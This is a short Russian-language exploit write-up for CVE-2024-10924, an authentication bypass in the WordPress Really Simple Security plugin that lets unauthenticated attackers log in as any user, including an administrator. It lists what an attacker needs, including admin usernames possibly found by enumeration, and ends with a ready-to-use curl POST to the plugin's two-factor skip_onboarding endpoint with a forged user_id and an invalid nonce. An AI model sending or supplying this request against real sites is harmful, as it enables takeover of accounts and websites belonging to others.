
Эксплойт для CVE-2024-10924, критический обход аутентификации в плагине WordPress Really Simple Security (версии 9.0.0-9.1.1.1). Позволяет неаутентифицированным злоумышленникам войти в систему под видом любого пользователя через уязвимость в API двухфакторной аутентификации.
CVE-2024-10924 — критическая уязвимость обхода аутентификации в плагине Really Simple Security для WordPress (версии 9.0.0 – 9.1.1.1). Эта уязвимость позволяет неаутентифицированным злоумышленникам войти в систему под любым пользователем (включая администратора), используя ошибку в API двухфакторной аутентификации (2FA).
Сайт WordPress, работающий под уязвимой версией плагина Really Simple Security. Python 3.x или cURL, установленные для тестирования. Имя пользователя администратора WordPress (возможно, потребуется перебор пользователей).
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v